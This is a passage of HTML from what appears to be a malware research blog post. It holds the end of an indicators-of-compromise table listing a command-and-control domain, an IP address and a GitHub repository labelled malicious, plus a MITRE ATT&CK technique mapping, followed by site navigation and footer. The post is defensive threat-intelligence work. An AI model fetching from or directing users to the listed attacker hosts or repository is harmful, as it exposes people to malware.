			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
Command &amp; Control</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
DOMAIN</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
x47[.]in</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
Command &amp; Control</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
URL</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
https://github.com/lirongchun/i/</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
Malicious git repository</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
IP</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
45.199.88[.]86</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
Command &amp; Control</pre>
			</td>
		</tr>
	</tbody>
</table>
</div>
<p>&nbsp;</p>
<h2>Mapped to MITRE ATT&amp;CK</h2>

<p>The findings of this report are mapped to the following <a href="https://attack.mitre.org/">MITRE ATT&amp;CK Matrix</a> techniques:</p>

<ul>
	<li>TA0010: Exfiltration
	<ul>
		<li>T1041: Exfiltration Over C2 Channel</li>
	</ul>
	</li>
	<li>TA0002: Execution
	<ul>
		<li>T1059: Command and Scripting Interpreter</li>
	</ul>
	</li>
	<li>TA0005: Defense Evasion
	<ul>
		<li>T1027: Obfuscated Files or Information</li>
		<li>T1564: Hide Artifacts</li>
		<li>T1562: Impair Defenses</li>
		<li>T1014: Rootkit</li>
		<li>T1036: Masquerading</li>
	</ul>
	</li>
</ul>
									</div>
									<div class="blog-related">
									<div class="be-ix-link-block"></div>
									</div>
								</div>
								<div class="blog-share">
									<h3>Share this with others</h3>
									<div class="blog-share-social-icons">
											
										<div class="sharethis-inline-share-buttons"></div>
									</div>
								</div>
							
							
							
								<div class="blog-categories">
								<p style="margin-bottom: 0px;">Tags: <a href="/blogs/tag/malware" title="malware" rel="nofollow">malware</a>, <a href="/blogs/tag/malware+research" title="malware research" rel="nofollow">malware research</a>, <a href="/blogs/tag/alienvault+labs" title="alienvault labs" rel="nofollow">alienvault labs</a>, <a href="/blogs/tag/prism" title="prism" rel="nofollow">prism</</p>
								</div>

							</div>
							
							<div class="col-sm-4 col-md-offset-1">
								<div>
									<div class="blog-sidebar-block">
    <form id="searchbox_002748587151982842036:gharkgtx6cu" action="/search-results/blog" class="sidebar-search">
        <input value="002748587151982842036:gharkgtx6cu" name="cx" type="hidden" />
        <input value="FORID:11" name="cof" type="hidden" />
        <div class="search-button">
            <input value="Search" name="sa" type="submit" />
        </div>
        <div class="search-field">
            <input id="q" name="q" type="text" aria-label="Search our blogs" placeholder="Search our blogs" />
        </div>
    </form>
</div>

									<div class="promo-block">
										
													
			<style type="text/css">#blog-promo-block-v2 .blog-promo-item-v2 {
    box-shadow: 1px 1px 5px #D2D2D229;
    border: 1px solid #D2D2D2;
    margin-bottom: 30px;
}
#blog-promo-block-v2 .blog-promo-item-v2 .blog-promo-resource-type-v2 {
    font-size: 14px;
    color: #0568AE;
    font-weight: 500;
    padding: 15px;
    margin: 0;
}
#blog-promo-block-v2 .blog-promo-item-v2 .blog-promo-item-text-v2 {
    margin-bottom:15px;
}
#blog-promo-block-v2 .blog-promo-item-v2 .blog-promo-item-text-v2 a {
    color: black;
    text-decoration: none;
    font-weight: 500;
}
#blog-promo-block-v2 .blog-promo-item-v2 .blog-promo-item-text-v2 p {
   margin: 0 15px;
}

#blog-promo-block-v2 .blog-promo-item-icon-v2 {
   margin: 15px;
   font-size: 16px;
}
#blog-promo-block-v2 .blog-promo-item-icon-v2 .icon-right {
    width: 20px;
    height: 20px;
    border: 1px solid #0568ae;
    border-radius: 20px;
    font-size: 9.5px;
    line-height: 18px;
    font-weight: 400;
    margin-right: 10px;
    padding-left: 4px;
    top: -1px;
}
@media (max-width: 1024px) {
 .blog-promo-item-v2 img {
    display: none;
  }
}
</style>
<div id="blog-promo-block-v2">
<h3>Featured resources</h3>

<div class="blog-promo-item-v2"><img alt="" src="https://cdn-cybersecurity.att.com/images/uploads/resource-images/5g-and-the-journey.jpg" />
<p class="blog-promo-resource-type-v2">INDUSTRY REPORT</p>

<div class="blog-promo-item-text-v2">
<p><a href="/resource-center/industry-reports/cybersecurity-insights-report-tenth-edition">AT&amp;T Cybersecurity Insights&trade; Report:<br />
5G and the Journey to the Edge</a></p>
</div>

<div class="blog-promo-item-icon-v2"><span aria-hidden="true" class="icon-right glyphicon glyphicon-chevron-right">&nbsp;</span> <a href="/resource-center/industry-reports/cybersecurity-insights-report-tenth-edition">Learn more</a></div>
</div>

<div class="blog-promo-item-v2"><img alt="" src="https://cdn-cybersecurity.att.com/images/uploads/resource-images/security-maturity-assessment.jpg" />
<p class="blog-promo-resource-type-v2">SELF ASSESSMENT</p>

<div class="blog-promo-item-text-v2">
<p><a href="/resource-center/security-maturity-assessment?utm_internal=blog-rail-assess">Benchmark your cybersecurity maturity</a></p>
</div>

<div class="blog-promo-item-icon-v2"><span aria-hidden="true" class="icon-right glyphicon glyphicon-chevron-right">&nbsp;</span> <a href="/resource-center/security-maturity-assessment?utm_internal=blog-rail-assess">Explore</a></div>
</div>
</div>
		
										

									</div>
								</div>
							</div>
						</div>
					</div>
				</section>


			</main>


			
			<style>

    /* Sticky button */
    .desktop .sticky_bottom_keeper {
        height: 80px;
    }
    .sticky_bottom_desktop.fixed {
        height: 80px;
    }
    .sticky_bottom_keeper .btn {
        color: #fff;
    }
    .sticky_bottom_keeper .btn-white {
        border: 2px solid #fff;
    }
    .sticky_bottom_keeper .btn-white.btn-border {
        background: transparent;
    }




    .line.line-8 {
        height: 8px;
    }

    .hh .sticky_bottom_keeper {
        display: none;
    }


</style>
<div class="sticky_bottom_keeper">

    <div class="sticky_bottom sticky_bottom_desktop ibp">
        <a href="/pricing/request-quote?utm_internal=sb_quote" class="btn btn-border btn-white btn-rounded btn-with-arrow">Get price</a>
        <a href="/products/usm-anywhere/free-trial?utm_internal=sb_freetrial_modal" class="btn btn-border btn-white btn-rounded btn-with-arrow">Free trial</a>

    </div>

</div>

			
		


		<footer id="footer" class="hidden-print">
  <div class="container-fluid">
    <div class="row">
      <div class="col-sm-6 col-md-3">
        
        <div class="footer_logo"><a href="https://business.att.com" target="_blank" rel="noopener"><img src="data:image/svg+xml;utf8,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20width%3D%22263px%22%20height%3D%2256px%22%3E%3Crect%20fill%3D%22none%22%20width%3D%22263%22%20height%3D%2257%22%2F%3E%3C%2Fsvg%3E" data-original="https://cdn-cybersecurity.att.com/images/uploads/logos/att_biz_hz_pref_rgb_white.png" alt="AT&T Business"></a></div>
        <div class="footer_featured">

          <div class="footer_featured_title">From the Blog</div>
          <article class="footer_featured_article">
            <div class="footer_featured_article_author clearfix">
	            
										<img src="data:image/svg+xml;utf8,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20width%3D%22150px%22%20height%3D%22150px%22%3E%3Crect%20fill%3D%22none%22%20width%3D%22150%22%20height%3D%22150%22%2F%3E%3C%2Fsvg%3E" data-original="/avatars/uploads/avatar_377_1.jpeg" width="150" height="150" alt="Ofer Caspi" />
									
              <div class="footer_featured_article_author_data">
                <h4>Ofer Caspi</h4>
                <time datetime="2021-02-23">Dec 23, 2021</time>
              </div>
            </div>
            <h3><a href="https://cybersecurity.att.com/blogs/labs-research/holiday-shopping-get-an-amazing75-discount-offer-a-case-study-on-a-suspicious-websiteoffering-special-holiday-sales" id="footer-link-blog-post">Holiday shopping? Get an amazing 75% discount offer? A case study on evaluating a special holiday sale  </a></h3>
          </article>
          <a id="footer-link-blog-all" href="/blogs" class="footer_featured_more">Explore All Blog Posts
            &#8250;</a>
        </div>
        

        <div class="social-style">
          <a href="https://www.twitter.com/attcyber/" class="social-link-twitter" target="_blank">Twitter</a>
          <a href="https://www.linkedin.com/company/attcybersecurity/" class="social-link-linkedin" target="_blank">Linkedin</a>
          <a href="https://www.facebook.com/ATTCyber/" class="social-link-facebook" target="_blank">Facebook</a>
          <a href="https://www.youtube.com/c/attcybersecurity" class="social-link-youtube" target="_blank">Youtube</a>
          <a href="https://www.instagram.com/attbusiness/" class="social-link-instagram" target="_blank">Instagram</a>
        </div>
      </div>

      <div class="col-sm-6 col-md-3">
        <div class="footer_links">
          <div class="heading">Who We Are</div>
          <ul>
            <li><a id="footer-link-labs" href="/alien-labs">Alien Labs</a></li>
            <li><a id="footer-link-customers" href="/who-we-are/customers">Customers</a></li>
            <li><a id="footer-link-careers" href="/who-we-are/careers">Careers</a></li>
            <li><a id="footer-link-contact" href="/contact">Contact Us</a></li>
          </ul>
        </div>

        <div class="footer_links">
          <div class="heading">News</div>
          <ul>
            <li><a id="footer-link-news-room" href="/who-we-are">Newsroom</a></li>
            <li><a id="footer-link-events" href="/who-we-are/events">Events</a></li>
            <li><a id="footer-link-blogs" href="/blogs">Blogs</a></li>
          </ul>
        </div>

        <div class="footer_links">
          <div class="heading">Partners</div>
          <ul>
            <li><a id="footer-link-partners" href="/partners">Partner Programs</a></li>
            <li><a id="footer-link-partner-portal" href="/partners/partner-portal/">Partner Portal</a></li>
          </ul>
        </div>
      </div>

      <div class="col-sm-6 col-md-3">
        <div class="footer_links">
          <div class="heading">Products</div>
          <ul>
		  	<li><a id="footer-link-mtdr" href="/products/managed-threat-detection-and-response">AT&T Managed Threat Detection and Response</a></li>
            <li><a id="footer-link-usm-anywhere" href="/products/usm-anywhere">USM Anywhere</a></li>
            <li><a id="footer-link-usm-mssp" href="/products/usm-for-mssp">USM for MSSPs</a></li>
            <li><a id="footer-link-otx" href="/open-threat-exchange">Open Threat Exchange (OTX)</a></li>
            <li><a id="footer-link-ossim" href="/products/ossim">OSSIM</a></li>

          </ul>
        </div>



        <div class="footer_links">
          <div class="heading">Solutions</div>
          <ul>
            <li><a id="footer-link-cloud-security" href="/solutions/cloud-security-monitoring">Cloud Security Monitoring</a></li>
            <li><a id="footer-link-threat-detection" href="/solutions/threat-detection">Threat Detection</a></li>
            <li><a id="footer-link-ids" href="/solutions/intrusion-detection-system">Intrusion Detection</a></li>
            <li><a id="footer-link-siem" href="/solutions/siem-platform-solutions">SIEM platform solutions</a></li>
            <li><a id="footer-link-vulnerability" href="/solutions/vulnerability-assessment-remediation">Vulnerability
                Assessment</a></li>
            <li><a id="footer-link-all-solutions" class="btn-with-arrow" href="/solutions">See All Solutions</a></li>
          </ul>
        </div>
      </div>

      <div class="col-sm-6 col-md-3">
        <div class="footer_links">
          <div class="heading">Resources</div>
          <ul>
            <li><a id="footer-link-resources" href="/resource-center">Resources</a></li>
            <li><a id="footer-link-blog" href="/blogs">Blogs</a></li>
            <li><a id="footer-link-reference-guide" href="https://www.business.att.com/content/dam/attbusiness/guides/att-information-and-network-security-customer-reference-guide.pdf" target="_blank">Customer Reference Guide</a></li>

          </ul>
        </div>

        <div class="footer_links">
          <div class="heading">Customer Success</div>
          <ul>
            <li><a id="footer-link-support" href="/support">Support &amp; Services</a></li>
            <li><a id="footer-link-customer-portal" href="https://success.alienvault.com" target="_blank">Success Center</a></li>
            <li><a id="footer-link-documentation" href="/documentation">Documentation Center</a></li>
            <li><a id="footer-link-classroom-training" href="/training">Training</a></li>
            <li><a id="footer-link-certification" href="/certification">Certification</a></li>
          </ul>
        </div>

        <div class="footer_contact">
          <a href="/contact" id="footer-button-contact" class="btn btn-blue margin-bottom20">Contact us</a>
        </div>
      </div>
    </div>
    <div class="footer_legal">
      <p class="footer_legal_copy">&copy; Copyright 2021</p>
      <ul class="footer_legal_links">
        <li><a id="footer-link-privacy" href="/legal/privacy-policy">Privacy Policy</a></li>
        <li><a id="footer-link-terms" href="/terms/website-terms-of-use07may2018">Website Terms of Use</a></li>
        <li><a id="footer-link-gdpr" href="/legal/gdpr">GDPR</a></li>
        <li><a id="footer-link-cookie" href="/legal/cookie-policy">Cookie Policy</a></li>
        <li><a id="footer-link-personal-info" href="https://about.att.com/csr/home/privacy/rights_choices.html" target="_blank">Do Not Sell My Personal Information</a></li>

      </ul>
    </div>
  </div>
</footer>

<div id="valid_content"></div>

		
	<script src="https://cdn-cybersecurity.att.com/js/v2/imports/blog-bundle.min.js?v=20211221850047" defer></script>






		



<div class="cookie-notice">
    <p>We use cookies to provide you with a great user experience. By using our website, you agree to our <a href="https://www.att.com/privacy">Privacy Policy</a> and <a href="/terms/website-terms-of-use07may2018">Website Terms of Use</a>.</p>
    <a class="cookie-notice-close" href="#" aria-label="Close Cookie Notice"><span class="glyphicon glyphicon-remove"></span></a>
</div>


<!-- WGT-10310 -->

<!-- END WGT-10310 -->

<script type="text/javascript" async src="https://cdn-cybersecurity.att.com/js/v2/imports/vidyard-av.js" ></script>
<script type="text/javascript" defer src="//play.vidyard.com/embed/v4.js"></script>
<script type="text/javascript" defer src="//play.vidyard.com/v1/progress-events.js"></script>




<script>
if (typeof ddo !== "undefined") {initAdobePageTrackingFooter();}

function initAdobePageTrackingFooter() {
    
    customAdobeTrackingPageLoadObj['page.pageInfo.pageTitle'] = document.title.trim();

    

    customAdobeTrackingPageLoadObj['page.pageInfo.friendlyPageName'] = 'CYB '+ document.title.trim() +' Pg';

    customAdobeTrackingPageLoadObj['page.pageInfo.language'] = 'EN';
    customAdobeTrackingPageLoadObj['page.pageInfo.lineOfBusiness'] = 'Business Solutions';
    customAdobeTrackingPageLoadObj['page.category.pageFunction'] = 'Learn';
    customAdobeTrackingPageLoadObj['page.category.pageOwnership'] = 'Business';
    customAdobeTrackingPageLoadObj['page.attributes.applicationName'] = 'CYB';
    customAdobeTrackingPageLoadObj['page.pageInfo.appCode'] = 'ACS';
    customAdobeTrackingPageLoadObj['page.category.siteSection'] = 'CYB';
    customAdobeTrackingPageLoadObj['page.category.siteSection'] = 'CYB';
    customAdobeTrackingPageLoadObj['page.media.class'] = 'Text';
    customAdobeTrackingPageLoadObj['page.media.category'] = 'Security';
    customAdobeTrackingPageLoadObj['page.location.domain'] = window.location.hostname;
	ddo.pushEvent('pageLoad', 'Page_Load', customAdobeTrackingPageLoadObj);
}
</script>


		<script>
			window.addEventListener('DOMContentLoaded', function() {
				$(window).load(function () {
					var hideSubscribe = AV.Utilities.readCookie('stickyBlogSubscribe');
					// if the cookie hasn't been set...
					if (hideSubscribe == null) {
						setTimeout(function () {
							// make the modal appear
							$('#blog-subscribe-box').fadeIn();
						}, 10000);

						// when the "Close" button is clicked
						$('.blog-subscribe-close-btn').click(function (e) {
							e.preventDefault();
							// set the cookie
							AV.Utilities.setCookie('stickyBlogSubscribe', true, 1);
							$('#blog-subscribe-box').fadeOut();
						});
					}
				});
			});
		</script>

	<script type="text/javascript"  src="/2egU/Wdpn/GK/iIu0/Qw2w/Eab1DJkQ/UQF7/aUkrEWoA/QAUC"></script></body>
</html>
